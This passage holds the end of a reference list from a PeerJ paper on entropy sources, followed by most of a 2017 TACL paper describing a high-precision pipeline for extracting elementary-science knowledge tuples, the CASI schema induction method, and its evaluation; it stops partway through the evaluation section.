openmp.org/wp-content/uploads/OpenMP-API-Specification-5.0.pdf (accessed on February 2020). Pan W, Zheng F, Zhao Y, Zhu W-T, Jing J. 2016. An efficient elliptic curve cryptography signature server with GPU acceleration. IEEE Transactions on Information Forensics and Security 12(1):111–122. Patel RA, Zhang Y, Mak J, Davidson A, Owens JD. 2012. Parallel lossless data compression on the GPU. Piscataway: IEEE. Ristenpart T, Yilek S. 2010. When good randomness goes bad: virtual machine reset vulnerabilities and hedging deployed cryptography. In: Proceedings of Network and Distributed Security Symposium (NDSS). San Diego, CA, USA: The Internet Society, 1–18. Schneier B, Fredrikson M, Kohno T, Ristenpart T. 2015. Surreptitiously weakening cryptographic systems. In: IACR Cryptol. ePrint Arch. vol. 2015. 97. Available at https://eprint.iacr.org/2015/097 (accessed on February 2020). Seward J. 2019. bzip2 and libbzip2, version 1.0.8: a program and library for data compression. Available at https://sourceware.org/bzip2/ . Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 28/29 https://peerj.com http://dx.doi.org/10.1007/978-3-642-36095-4_9 https://chronox.de/lrng/doc/lrng.pdf https://chronox.de/lrng/doc/lrng.pdf https://github.com/usnistgov/SP800-90B_EntropyAssessment https://github.com/usnistgov/SP800-90B_EntropyAssessment http://csrc.nist.gov/groups/STM/cmvp/documents/fips140-2/FIPS1402IG.pdf http://csrc.nist.gov/groups/STM/cmvp/documents/fips140-2/FIPS1402IG.pdf https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://www.openmp.org/wp-content/uploads/OpenMP-API-Specification-5.0.pdf https://www.openmp.org/wp-content/uploads/OpenMP-API-Specification-5.0.pdf https://eprint.iacr.org/2015/097 https://sourceware.org/bzip2/ http://dx.doi.org/10.7717/peerj-cs.404 Shastry K, Pandey A, Agrawal A, Sarveswara R. 2016. Compression acceleration using GPGPU. In: 2016 IEEE 23rd international conference on high performance computing workshops (HiPCW). Piscataway: IEEE, 70–78. Stevens M, Bursztein E, Karpman P, Albertini A, Markov Y. 2017. The first collision for full SHA-1. In: Annual international cryptology conference. Heidelberg: Springer, 570–596. Sönmez Turan M, Barker E, Kelsey J, McKay K, Baish M, Boyle M. 2016. Recommenda- tion for the entropy sources used for random bit generation. In: National Institute of Standards and Technology. NIST Special Publication (SP) 800-90B (2nd Draft). Sönmez Turan M, Barker E, Kelsey J, McKay K, Baish M, Boyle M. 2018. Recommen- dation for the entropy sources used for random bit generation. In: National Institute of Standards and Technology. NIST Special Publication (SP) 800-90B. Available at https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-90B.pdf . Vaidya B. 2018. Hands-On GPU-accelerated computer vision with OpenCV and CUDA: effective techniques for processing complex image data in real time using GPUs. Birmingham, UK: Packt Publishing Ltd. Yoo T, Kang J-S, Yeom Y. 2017. Recoverable random numbers in an internet of things operating system. Entropy 19(3):113 DOI 10.3390/e19030113. Zhu S, Ma Y, Chen T, Lin J, Jing J. 2017. Analysis and improvement of entropy esti- mators in NIST SP 800-90B for non-IID entropy sources. IACR Transactions on Symmetric Cryptology 2017(3):151–168 DOI 10.46586/tosc.v2017.i3.151-168. Zhu S, Ma Y, Li X, Yang J, Lin J, Jing J. 2019. On the analysis and improvement of min- entropy estimation on time-varying data. IEEE Transactions on Information Forensics and Security 15:1696–1708. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 29/29 https://peerj.com https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-90B.pdf http://dx.doi.org/10.3390/e19030113 http://dx.doi.org/10.46586/tosc.v2017.i3.151-168 http://dx.doi.org/10.7717/peerj-cs.404 work_n76p34ulzzhl3bferrd3xk3pgu ---- Domain-Targeted, High Precision Knowledge Extraction Bhavana Dalvi Mishra Niket Tandon Allen Institute for Artificial Intelligence 2157 N Northlake Way Suite 110, Seattle, WA 98103 {bhavanad,nikett,peterc}@allenai.org Peter Clark Abstract Our goal is to construct a domain-targeted, high precision knowledge base (KB), contain- ing general (subject,predicate,object) state- ments about the world, in support of a down- stream question-answering (QA) application. Despite recent advances in information extrac- tion (IE) techniques, no suitable resource for our task already exists; existing resources are either too noisy, too named-entity centric, or too incomplete, and typically have not been constructed with a clear scope or purpose. To address these, we have created a domain- targeted, high precision knowledge extraction pipeline, leveraging Open IE, crowdsourcing, and a novel canonical schema learning algo- rithm (called CASI), that produces high pre- cision knowledge targeted to a particular do- main - in our case, elementary science. To measure the KB’s coverage of the target do- main’s knowledge (its “comprehensiveness” with respect to science) we measure recall with respect to an independent corpus of do- main text, and show that our pipeline produces output with over 80% precision and 23% re- call with respect to that target, a substantially higher coverage of tuple-expressible science knowledge than other comparable resources. We have made the KB publicly available1. 1 Introduction While there have been substantial advances in knowledge extraction techniques, the availability of high precision, general knowledge about the world, 1This KB named as “Aristo Tuple KB” is available for down- load at http://data.allenai.org/tuple-kb remains elusive. Specifically, our goal is a large, high precision body of (subject,predicate,object) statements relevant to elementary science, to sup- port a downstream QA application task. Although there are several impressive, existing resources that can contribute to our endeavor, e.g., NELL (Carlson et al., 2010), ConceptNet (Speer and Havasi, 2013), WordNet (Fellbaum, 1998), WebChild (Tandon et al., 2014), Yago (Suchanek et al., 2007), FreeBase (Bollacker et al., 2008), and ReVerb-15M (Fader et al., 2011), their applicability is limited by both • limited coverage of general knowledge (e.g., FreeBase and NELL primarily contain knowl- edge about Named Entities; WordNet uses only a few (< 10) semantic relations) • low precision (e.g., many ConceptNet asser- tions express idiosyncratic rather than general knowledge) Our goal in this work is to create a domain-targeted knowledge extraction pipeline that can overcome these limitations and output a high precision KB of triples relevant to our end task. Our approach leverages existing techniques of open information extraction (Open IE) and crowdsourcing, along with a novel schema learning algorithm. There are three main contributions of this work. First, we present a high precision extraction pipeline able to extract (subject,predicate,object) tuples rele- vant to a domain with precision in excess of 80%. The input to the pipeline is a corpus, a sense- disambiguated domain vocabulary, and a small set of entity types. The pipeline uses a combination of text filtering, Open IE, Turker annotation on sam- ples, and precision prediction to generate its output. 233 Transactions of the Association for Computational Linguistics, vol. 5, pp. 233–246, 2017. Action Editor: Patrick Pantel. Submission batch: 11/2016; Revision batch: 2/2017; Published 7/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Second, we present a novel canonical schema in- duction method (called CASI) that identifies clus- ters of similar-meaning predicates, and maps them to the most appropriate general predicate that cap- tures that canonical meaning. Open IE, used in the early part of our pipeline, generates triples con- taining a large number of predicates (expressed as verbs or verb phrases), but equivalences and gen- eralizations among them are not captured. Syn- onym dictionaries, paraphrase databases, and verb taxonomies can help identify these relationships, but only partially so because the meaning of a verb often shifts as its subject and object vary, something that these resources do not explicitly model. To address this challenge, we have devel- oped a corpus-driven method that takes into account the subject and object of the verb, and thus can learn argument-specific mapping rules, e.g., the rule “(x:Animal,found in,y:Location) → (x:Animal,live in,y:Location)” states that if some animal is found in a location then it also means the animal lives in the location. Note that ‘found in’ can have very dif- ferent meaning in the schema “(x:Substance,found in,y:Material). The result is a KB whose general predicates are more richly populated, still with high precision. Finally, we contribute the science KB itself as a resource publicly available2 to the research commu- nity. To measure how “complete” the KB is with re- spect to the target domain (elementary science), we use an (independent) corpus of domain text to char- acterize the target science knowledge, and measure the KB’s recall at high (>80%) precision over that corpus (its “comprehensiveness” with respect to sci- ence). This measure is similar to recall at the point P=80% on the PR curve, except measured against a domain-specific sample of data that reflects the dis- tribution of the target domain knowledge. Compre- hensiveness thus gives us an approximate notion of the completeness of the KB for (tuple-expressible) facts in our target domain, something that has been lacking in earlier KB construction research. We show that our KB has comprehensiveness (recall of domain facts at >80% precision) of 23% with respect to science, a substantially higher coverage 2Aristo Tuple KB is available for download at http:// allenai.org/data/aristo-tuple-kb of tuple-expressible science knowledge than other comparable resources. We are making the KB pub- licly available. Outline We discuss the related work in Section 2. In Sec- tion 3, we describe the domain-targeted pipeline, in- cluding how the domain is characterized to the al- gorithm and the sequence of filters and predictors used. In Section 4, we describe how the relation- ships between predicates in the domain are identi- fied and the more general predicates further pop- ulated. Finally in Section 5, we evaluate our ap- proach, including evaluating its comprehensiveness (high-precision coverage of science knowledge). 2 Related Work There has been substantial, recent progress in knowledge bases that (primarily) encode knowledge about Named Entities, including Freebase (Bol- lacker et al., 2008), Knowledge Vault (Dong et al., 2014), DBPedia (Auer et al., 2007), and others that hierarchically organize nouns and named entities, e.g., Yago (Suchanek et al., 2007). While these KBs are rich in facts about named entities, they are sparse in general knowledge about common nouns (e.g., that bears have fur). KBs covering general knowledge have received less attention, although there are some notable exceptions constructed using manual methods, e.g., WordNet (Fellbaum, 1998), crowdsourcing, e.g., ConceptNet (Speer and Havasi, 2013), and, more recently, using automated meth- ods, e.g., WebChild (Tandon et al., 2014). While useful, these resources have been constructed to tar- get only a small set of relations, providing only lim- ited coverage for a domain of interest. To overcome relation sparseness, the paradigm of Open IE (Banko et al., 2007; Soderland et al., 2013) extracts knowledge from text using an open set of relationships, and has been used to success- fully build large-scale (arg1,relation,arg2) resources such as ReVerb-15M (containing 15 million general triples) (Fader et al., 2011). Although broad cov- erage, however, Open IE techniques typically pro- duce noisy output. Our extraction pipeline can be viewed as an extension of the Open IE paradigm: we start with targeted Open IE output, and then ap- ply a sequence of filters to substantially improve the 234 Figure 1: The extraction pipeline. A vocabulary-guided sequence of open information extraction, crowdsourcing, and learning predicate relationships are used to produce high precision tuples relevant to the domain of interest. output’s precision, and learn and apply relationships between predicates. The task of finding and exploiting relationships between different predicates requires identifying both equivalence between relations (e.g., clustering to find paraphrases), and implication (hierarchical organization of relations). One class of approach is to use existing resources, e.g., verb taxonomies, as a source of verbal relationships, e.g., (Grycner and Weikum, 2014), (Grycner et al., 2015). How- ever, the hierarchical relationship between verbs, out of context, is often unclear, and some verbs, e.g., “have”, are ambiguous. To address this, we char- acterize semantic relationships not only by a verb but also by the types of its arguments. A sec- ond class of approach is to induce semantic equiva- lence from data, e.g., using algorithms such as DIRT (Lin and Pantel, 2001), RESOLVER (Yates and Et- zioni, 2009), WiseNet (Moro and Navigli, 2012), and AMIE (Galárraga et al., 2013). These allow relational equivalences to be inferred, but are also noisy. In our pipeline, we combine these two ap- proaches together, by clustering relations using a similarity measure computed from both existing re- sources and data. A novel feature of our approach is that we not only cluster the (typed) relations, but also identify a canonical relation that all the other relations in a cluster can be mapped to, without recourse to human annotated training data or a target relational vocab- ulary (e.g., from Freebase). This makes our prob- lem setting different from that of universal schema (Riedel et al., 2013) where the clusters of relations are not explicitly represented and mapping to canon- ical relations can be achieved given an existing KB like Freebase. Although no existing methods can be directly applied in our problem setting, the AMIE- based schema clustering method of (Galárraga et al., 2014) can be modified to do this also. We have implemented this modification (called AMIE*, de- scribed in Section 5.3), and we use it as a baseline to compare our schema clustering method (CASI) against. Finally, interactive methods have been used to create common sense knowledge bases, for ex- ample ConceptNet (Speer and Havasi, 2013; Liu and Singh, 2004) includes a substantial amount of knowledge manually contributed by people through a Web-based interface, and used in numerous ap- plications (Faaborg and Lieberman, 2006; Dinakar et al., 2012). More recently there has been work on interactive methods (Dalvi et al., 2016; Wolfe et al., 2015; Soderland et al., 2013), which can be seen as a “machine teaching” approach to KB con- struction. These approaches focus on human-in-the- loop methods to create domain specific knowledge bases. Such approaches are proven to be effective on domains where expert human input is available. In contrast, our goal is to create extraction tech- niques that need little human supervision, and result in comprehensive coverage of the target domain. 3 The Extraction Pipeline We first describe the overall extraction pipeline. The pipeline is a chain of filters and transformations, out- putting (subject,predicate,object) triples at the end. It uses a novel combination of familiar technologies, plus a novel schema learning module, described in 235 more detail in Section 4. 3.1 Inputs and Outputs Unlike many prior efforts, our goal is a domain- focused KB. To specify the KB’s extent and focus, we use two inputs: 1. A domain vocabulary listing the nouns and verbs relevant to the domain. In our particular application, the domain is Elementary science, and the domain vocabulary is the typical vocab- ulary of a Fourth Grader (∼10 year old child), augmented with additional science terms from 4th Grade Science texts, comprising of about 6000 nouns, 2000 verbs, 2000 adjectives, and 600 adverbs. 2. A small set of types for the nouns, listing the primary types of entity relevant to the domain. In our domain, we use a manually constructed inventory of 45 types (animal, artifact, body part, measuring instrument, etc.). In addition, the pipeline also uses: 3. a large, searchable text corpus to provide sen- tences for knowledge extraction. In our case, we use the Web via a search engine (Bing), fol- lowed by filters to extract clean sentences from search results. 3.2 Word Senses Although, in general, nouns are ambiguous, in a targeted domain there is typically a clear, primary sense that can be identified. For example, while in general the word “pig” can refer to an animal, a per- son, a mold, or a block of metal, in 4th Grade Sci- ence it universally refers to an animal3. We leverage this for our task by assuming one sense per noun in the domain vocabulary, and notate these senses by manually assigning each noun to one of the entity types in the type inventory. Verbs are more challenging, because even within a domain they are often polysemous out of con- text (e.g., “have”). To handle this, we refer to verbs along with their argument types, the com- bination expressed as a verbal schema, e.g., (Ani- mal,“have”,BodyPart). This allows us to distinguish 3 There are exceptions, e.g., in 4th Grade Science “bat” can refer to either the animal or the sporting implement, but these cases are rare. different contextual uses of a verb without introduc- ing a proliferation of verb sense symbols. Others have taken a similar approach of using type restric- tions to express verb semantics (Pantel et al., 2007; Del Corro et al., 2014). 3.3 The Pipeline The pipeline is sketched in Figure 1 and exemplified in Table 1, and consists of six steps: 3.3.1 Sentence Selection The first step is to construct a collection of (loosely) domain-appropriate sentences from the larger corpus. There are multiple ways this could be done, but in our case we found the most effective way was as follows: a. List the core topics in the domain of inter- est (science), here producing 81 topics derived from syllabus guides. b. For each topic, author 1-3 query templates, pa- rameterized using one or more of the 45 do- main types. For example, for the topic “animal adapation”, a template was “[Animal] adapta- tion environment”, parameterized by the type Animal. The purpose of query templates is to steer the search engine to domain-relevant text. c. For each template, automatically instantiate its type(s) in all possible ways using the domain vocabulary members of those types. d. Use each instantiation as a search query over the corpus, and collect sentences in the top (here, 10) documents retrieved. In our case, this resulted in a generally domain- relevant corpus of 7M sentences. 3.3.2 Tuple Generation Second, we run an open information extraction system over the sentences to generate an initial set of (np,vp,np) tuples. In our case, we use OpenIE 4.2 (Soderland et al., 2013; Mausam et al., 2012). 3.3.3 Headword Extraction and Filtering Third, the np arguments are replaced with their headwords, by applying a simple headword filtering utility. We discard tuples with infrequent vps or ver- bal schemas (here vp frequency < 10, schema fre- quency < 5). 236 Pipeline Example Outputs: Inputs: corpus + vocabulary + types 1. Sentence selection: “In addition, green leaves have chlorophyll.”) 2. Tuple Generation: (“green leaves” “have” “chlorophyll”) 3. Headword Extraction: (“leaf” “have” “chlorophyll”) 4. Refinement and Scoring: (“leaf” “have” “chlorophyll”) @0.89 (score) 5. Phrasal tuple generation: (“leaf” “have” “chlorophyll”) @0.89 (score) (“green leaf” “have” “chlorophyll”) @0.89 (score) 6. Relation Canonicalization: (“leaf” “have” “chlorophyll”) @0.89 (score) (“green leaf” “have” “chlorophyll”) @0.89 (score) (“leaf” “contain” “chlorophyll”) @0.89 (score) (“green leaf” “contain” “chlorophyll”) @0.89 (score) Table 1: Illustrative outputs of each step of the pipeline for the term “leaf”. 3.3.4 Refinement and Scoring Fourth, to improve precision, Turkers are asked to manually score a proportion (in our case, 15%) of the tuples, then a model is constructed from this data to score the remainder. For the Turk task, Turkers were asked to label each tuple as true or false/nonsense. Each tuple is labeled 3 times, and a majority vote is applied to yield the overall label. The semantics we apply to tuples (and which we ex- plain to Turkers) is one of plausibility: if the fact is true for some of the arg1’s, then score it as true. For example, if it is true that some birds lay eggs, then the tuple (bird, lay, egg) should be marked true. The degree of manual vs. automated can be selected here depending on the precision/cost constraints of the end application. We then build a model using this data to predict scores on other tuples. For this model, we use lo- gistic regression applied to a set of tuple features. These tuple features include normalized count fea- tures, schema and type level features, PMI statis- tics and semantic features. Normalized count fea- tures are based on the number of occurrences of tu- ples, and the number of unique sentences the tuple is extracted from. Schema and type level features are derived from the subject and object type, and frequency of schema in the corpus. Semantic fea- tures are based on whether subject and object are ab- stract vs. concrete (using Turney et al’s abstractness database (Turney et al., 2011)), and whether there are any modal verbs (e.g. may, should etc.) in the original sentence. PMI features are derived from the count statistics of subject, predicate, object and en- tire triple in the Google n-gram corpus (Brants and Franz, 2006). 3.3.5 Phrasal Tuple Generation Fifth, for each headword tuple (n,vp,n), retrieve the original phrasal triples (np,vp,np) it was de- rived from, and add sub-phrase versions of these phrasal tuples to the KB. For example, if a headword tuple (cat, chase, mouse) was derived from (A black furry cat, chased, a grey mouse) then the algorithm considers adding (black cat, chase, mouse) (black furry cat, chase, mouse) (black cat, chase, grey mouse) (black furry cat, chase, grey mouse) Valid noun phrases are those following a pattern “<Adj>* <Noun>+”. The system only retains constructed phrasal tuples for which both subject and object phrases satisfy PMI and count thresh- olds4, computed using the Google N-gram corpus (Brants and Franz, 2006). In general, if the head- word tuple is scored as correct and the PMI and count thresholds are met, then the phrasal originals and variants are also correct. (We evaluate this in Section 5.2). 3.3.6 Canonical Schema Induction Finally, we induce a set of schema mapping rules over the tuples that identify clusters of equivalent and similar relations, and map them to a canonical, generalized relation. These canonical, generalized relations are referred to as canonical schemas, and the induction algorithm is called CASI (Canonical Schema Induction). The rules are then applied to the tuples, resulting in additional general tuples be- ing added to the KB. The importance of this step is that generalizations among seemingly disparate tu- ples are made explicit. While we could then discard 4 e.g., “black bear” is a usable phrase provided it occurs > k1 times in the N-gram corpus and log[p(“black bear”)/p(“black”).p(“bear”)] > k2 in the N-gram corpus, where constants k1 and k2 were chosen to optimize performance on a small test set. 237 tuples that are mapped to a generalized form, we in- stead retain them in case a query is made to the KB that requires the original fine-grained distinctions. In the next section, we describe how these schema mapping rules are learned. 4 Canonical Schema Induction (CASI) 4.1 Task: Induce schema mapping rules The role of the schema mapping rules is to make generalizations among seemingly disparate tuples explicit in the KB. To do this, the system identi- fies clusters of relations with similar meaning, and maps them to a canonical, generalized relation. The mappings are expressed using a set of schema map- ping rules, and the rules can be applied to infer ad- ditional, general triples in the KB. Informally, map- ping rules should combine evidence from both ex- ternal resources (e.g., verb taxonomies) and data (tuples in the KB). This observation allows us to formally define an objective function to guide the search for mapping rules. We define: • a schema is a structure (type1,verb phrase,type2) here the types are from the input type inventory. • a schema mapping rule is a rule of the form schemai → schemaj stating that a triple using schemai can be re- expressed using schemaj. • a canonical schema is a schema that does not occur on the left-hand side of any mapping rule, i.e., it does not point to any other schema. To learn a set of schema mapping rules, we select from the space of possible mapping rules so as to: • maximize the quality of the selected mapping rules, i.e., maximize the evidence that the se- lected rules express valid paraphrases or gen- eralization. That is we are looking for synony- mous and type-of edges between schemas. This evidence is drawn from both existing resources (e.g., WordNet) and from statistical evidence (among the tuples themselves). • satisfy the constraint that every schema points to a canonical schema, or is itself a canonical schema. We can view this task as a subgraph selection prob- lem in which the nodes are schemas, and directed edges are possible mapping rules between schemas. The learning task is to select subgraphs such that all nodes in a subgraph are similar, and point to a sin- gle, canonical node (Figure 2). We refer to the blue nodes in Figure 2 as induced canonical schemas. To solve this selection problem, we formulate it as as a linear optimization task and solve it using inte- ger linear programming (ILP), as we now describe. Figure 2: Learning schema mapping rules can be viewed as a subgraph selection problem, whose result (illus- trated) is a set of clusters of similar schemas, all pointing to a single, canonical form. 4.2 Features for learning schema mapping rules To assess the quality of candidate mapping rules, we combine features from the following sources: Moby, WordNet, association rules and statistical features from our corpus. These features indicate synonymy or type-of links between schemas. For each schema Si e.g. (Animal, live in, Location) we define the re- lation ri as being the verb phrase (e.g. “live in”), and vi as the root verb of ri (e.g. “live”). • Moby: We also use verb phrase similarity scores derived from the Moby thesaurus. Moby score Mij for a schema pair is computed by a lookup in this dataset for relation pair ri, rj or root verb pair vi, vj. This is also a directed fea- ture, i.e. Mij 6= Mji. • WordNet: If there exists a troponym link path from schema ri to rj, then we define the Word- Net score Wij for this schema pair as the in- verse of the number of edges that need to be 238 Type Use which parts of schema? What kind of relations do they encode? Feature source semantic distributional subject predicate object synonym type-of temporal implication Moby X X X X WordNet X X X AMIE-typed X X X X X X AMIE-untyped X X X X X X Table 2: The different features used in relation canonicalization capture different aspects of similarity. maximize {Xij} ∑ i,j Xij ( λ1 ∗Mij + λ2 ∗Wij+λ3 ∗ATij +λ4 ∗AUij+λ5 ∗Sij ) −δ ∗‖X‖1 subject to, Xij ∈{0,1}, ∀〈i,j〉 Xij are boolean. Xij + Xji ≤ 1, ∀i,j schema mapping relation is asymmetric. ∑ j Xij ≤ 1, ∀i select at most one parent per schema. Xij + Xjk −Xik ≤ 1, ∀〈i,j,k〉 schema mapping relation is transitive. (1) Figure 3: The ILP used for canonical schema induction traveled to reach rj from ri. If such a path does not exist, then we look for a path from vi to vj. Since we do not know the exact Word- Net synset applicable for each schema, we con- sider all possible synset choices and pick the best score as Wij. This is a directed feature i.e., Wij 6= Wji. Note that even though Word- Net is a high quality resource, it is not com- pletely sufficient for our purposes. Out of 955 unique relations (verb phrases) in our KB, only 455 (47%) are present in WordNet. We can deal with these out of WordNet verb phrases by re- lying on other sets of features described next. • AMIE: AMIE is an association rule min- ing system that can produce association rules of the form: “?a eat ?b → ?a consume ?b”. We have two sets of AMIE fea- tures: typed and untyped. Untyped features are of the form ri → rj, e.g., eat → consume, whereas typed features are of the form Si → Sj, e.g., (Animal,eat,Food) → (Animal,consume,Food). AMIE produces real valued scores5 between 0 to 1 for each rule. We define AUij and ATij as untyped and typed AMIE rule scores respectively. 5We use PCA confidence scores produced by AMIE. • Specificity: We define specificity of each re- lation as its IDF score in terms of the number of argument pairs it occurs with, compared to total number of argument type pairs in the cor- pus. The specificity score of a schema mapping rule favors more general predicates on the par- ent side of the rules. specificity(r) = IDF(r) SP(r) = specificity(r) maxr′ specificity(r ′) Sij = SP(ri)−SP(rj) Further, we have a small set of very generic re- lations like “have” and “be” that are considered as relation stopwords by setting their SP(r) scores to 1. These features encode different aspects of simi- larity between schemas as described in Table 2. In this work we combine semantic high-quality fea- tures from WordNet, Moby thesaurus with weak dis- tributional similarity features from AMIE to gener- ate schema mapping rules. We have observed that thesaurus features are very effective for predicates which are less ambiguous e.g. eat, consume, live in. Association rule features on the other hand have ev- idence for predicates which are very ambiguous e.g. have, be. Thus these features are complementary. Further, these features indicate different kinds of 239 relations between two schemas: synonymy, type- of and temporal implication (refer Table 2). In this work, we want to learn the schema mapping rules that capture synonymy and type-of relations and discard the temporal implications. This makes our problem setting different from that of knowl- edge base completion methods e.g., (Socher et al., 2013). Our proposed method CASI uses an ensem- ble of semantic and statistical features enabling us to promote the synonymy and type-of edges, and to select the most general schema as canonical schema per cluster. 4.3 ILP model used in CASI The features described in Section 4.2 provide par- tial support for possible schema mapping rules in our dataset. The final set of rules we select needs to comply with asymmetry, transitive closure and at most one parent per schema constraints. We use an integer linear program to find the optimal set of schema mapping rules that satisfy these constraints, shown formally in Figure 3. We decompose the schema mapping problem into multiple independent sub-problems by considering schemas related to a pair of argument types, e.g, all schemas that have domain or range types An- imal, Location would be considered as a separate sub-problem. This way we can scale our method to large sets of schemas. The ILP for each sub-problem is presented in Equation 1. In Equation 1, each Xij is a boolean variable representing whether we pick the schema mapping rule Si → Sj. As described in Section 4.2, Mij,Wij,ATij,AUij,Sij represent the scores pro- duced by Moby, WordNet, AMIE-typed, AMIE- untyped and Specificity features respectively for the schema mapping rule Si → Sj. The objective func- tion maximizes the weighted combination of these scores. Further, the solution picked by this ILP sat- isfies constraints such as asymmetry, transitive clo- sure and at most one parent per schema. We also apply an L1 sparsity penalty on X, retaining only those schema mapping edges for which the model is reasonably confident. For n schemas, there are O(n3) transitivity con- straints which make the ILP very inefficient. Berant et al. (2011) proposed two approximations to handle a large number of transitivity rules by decomposing the ILP or solving it in an incremental way. Instead we re-write the ILP rules in such a way that we can efficiently solve our mapping problem without intro- ducing any approximations. The last two constraints of this ILP can be rewritten as follows: (∑ j Xij ≤ 1,∀i AND Xij + Xjk −Xik ≤ 1, ∀〈i,j,k〉 ) =⇒ If(Xij = 1) then Xjk = 0 ∀k This results in O(n2) constraints and makes the ILP efficient. Impact of this technique in terms of run- time is described in Section 5.3. We then use an off-the-shelf ILP optimization en- gine called SCPSolver (Planatscher and Schober, 2015) to solve the ILP problems. The output of our ILP model is the schema mapping rules. We then apply these rules onto KB tuples to generate addi- tional, general tuples. Some examples of the learned rules are: (Organism, have, Phenomenon) → (Organism, undergo, Phenomenon) (Animal, have, Event) → (Animal, experience, Event) (Bird, occupy, Location) → (Bird, inhabit, Location) 5 Evaluation 5.1 KB Comprehensiveness Our overall goal is a high-precision KB that has rea- sonably “comprehensive” coverage of facts in the target domain, on the grounds that these are the facts that a domain application is likely to query about. This notion of KB comprehensiveness is an impor- tant but under-discussed aspect of knowledge bases. For example, in the automatic KB construction lit- erature, while a KB’s size is often reported, this does not reveal whether the KB is near-complete or merely a drop in the ocean of that required (Razniewski et al., 2016; Stanovsky and Dagan, 2016). More formally, we define comprehensive- ness as: recall at high (> 80%) precision of domain- relevant facts. This measure is similar to recall at the point P=80% on the PR curve, except recall is mea- sured with respect to a different distribution of facts (namely facts about elementary science) rather than a held-out sample of data used to build the KB. The particular target precision value is not critical; what 240 KB Precision Coverage of Tuple-Expressible KB comprehensiveness w.r.t. Science domain Science Knowledge (Science recall @80% precision) (Recall on science KB) WebChild 89% 3.4% 3.4% NELL 85% 0.1% 0.1% ConceptNet 40% 8.4% n/a (p<80%) ReVerb-15M 55% 11.5% n/a (p<80%) Our KB 81% 23.2% 23.2% Table 3: Precision and coverage of tuple-expressible elementary science knowledge by existing resources vs. our KB. Precision estimates are within +/-3% with 95% confidence interval. is important is that the same precision point is used when comparing results. We choose 80% as subjec- tively reasonable; at least 4 out of 5 queries to the KB should be answered correctly. There are several ways this target distribution of required facts can be modeled. To fully realize the ambition of this metric, we would directly identify a sample of required end-task facts, e.g., by man- ual analysis of questions posed to the end-task sys- tem, or from logs of the interaction between the end- task system and the KB. However, given the practi- cal challenges of doing this at scale, we take a sim- pler approach and approximate this end-task distri- bution using facts extracted from an (independent) domain-specific text corpus (we call this a reference corpus). Note that these facts are only a sample of domain-relevant facts, not the entirety. Otherwise, we could simply run our extractor over the refer- ence corpus and have all we need. Now we are in a strong position, because the reference corpus gives us a fixed point of reference to measure comprehen- siveness: we can sample facts from it and measure what fraction the KB “knows”, i.e., can answer as true (Figure 4). For our specific task of elementary science QA, we have assembled a reference corpus6 of ∼1.2M sentences comprising of multiple elementary sci- ence textbooks, multiple dictionary definitions of all fourth grade vocabulary words, and simple Wikipedia pages for all fourth grade vocabulary words (where such pages exist). To measure our KB’s comprehensiveness (of facts within the ex- pressive power of our KB), we randomly sampled 4147 facts, expressed as headword tuples, from 6This corpus named as “Aristo MINI Corpus” is avail- able for download at http://allenai.org/data/ aristo-tuple-kb Figure 4: Comprehensiveness (frequency-weighted cov- erage C of the required facts D) can be estimated using coverage A of a reference KB B as a surrogate sampling of the target distribution. the reference corpus. These were generated semi- automatically using parts of our pipeline, namely in- formation extraction then Turker scoring to obtain true facts7. We call these facts the Reference KB8. To the extent our tuple KB contains facts in this Reference KB (and under the simplifying assump- tion that these facts are representative of the sci- ence knowledge our QA application needs), we say our tuple KB is comprehensive. Doing this yields a value of 23% comprehensiveness for our KB (Ta- ble 3). We also measured the precision and science cov- erage of other, existing fact KBs. For precision, we took a random sample of 1000 facts in each KB, and followed the same methodology as earlier so that the 7This method will of course miss many facts in the reference corpus, e.g., when extraction fails or when the fact is in a non- sentential form, e.g., a table. However, we only assume that the distribution of extracted facts is representative of the domain. 8These 4147 test facts are published with the dataset at http://allenai.org/data/aristo-tuple-kb 241 comparison is valid: Turkers label each fact as true or false/nonsense, each fact is labeled 3 times, and the majority label is the overall label. The preci- sions are shown in Table 3. For ConceptNet, we used only the subset of facts with frequency > 1, as frequency=1 facts are particularly noisy (thus the precision of the full ConceptNet would be lower). We also computed the science coverage (= com- prehensiveness, if p>80%) using our reference KB. Note that these other KBs were not designed with elementary science in mind and so, not surprisingly, they do not cover many of the relations in our do- main. To make the comparison as fair as possible, given these other KBs use different relational vocab- ularies, we first constructed a list of 20 very general relations (similar to the ConceptNet relations, e.g., causes, uses, part-of, requires), and then mapped re- lations used in both our reference facts, and in the other KBs, to these 20 relations. To compare if a reference fact is in one of these other KBs, only the general relations need to match, and only the subject and object headwords need to match. This allows substantial linguistic variation to be permitted dur- ing evaluation (e.g., “contain”,. “comprise”, “part of” etc. would all be considered matching). In other words, this is a generous notion of “a KB containing a fact”, in order to be as fair as possible. As Table 4 illustrates, these other KBs cover very little of the target science knowledge. In the case of WebChild and NELL, the primary reason for low recall is low overlap between their target and ours. NELL has almost no predicate overlap with our Ref- erence KB, reflecting it’s Named Entity centric con- tent. WebChild is rich in part-of and location in- formation, and covers 60% of part-of and location facts in our Reference KB. However, these are only 4.5% of all the facts in the Reference KB, resulting in an overall recall (and comprehensiveness) of 3%. In contrast, ConceptNet and ReVerb-15M have sub- stantially more relational overlap with our Reference KB, hence their recall numbers are higher. However, both have lower precision, limiting their utility. This evaluation demonstrates the limited science coverage of existing resources, and the degree to which we have overcome this limitation. The extrac- tion methods used to build these resources are not directly comparable since they are starting with dif- ferent input/output settings and involve significantly different degrees of supervision. Rather, the results suggest that general-purpose KBs (e.g., NELL) may have limited coverage for specific domains, and that our domain-targeted extraction pipeline can signifi- cantly alleviate this in terms of precision and cover- age when that domain is known. Extraction stage #schemas #tuples % Avg. output precision 2. Tuple generation - 7.5M 54.2 3. Headword tuples 29.3K 462K 68.0 4. Tuple scoring 15.8K 156K 87.2 5. Phrasal tuples 15.8K 286K 86.5 6. Canonical schemas 15.8K 340K 80.6 Table 4: Evaluation of KB at different stages of extrac- tion. Precision estimates are within +/-3% with 95% con- fidence interval. 5.2 Performance of the Extraction Pipeline In addition, we measured the average precision of facts present in the KB after every stage of the pipeline (Table 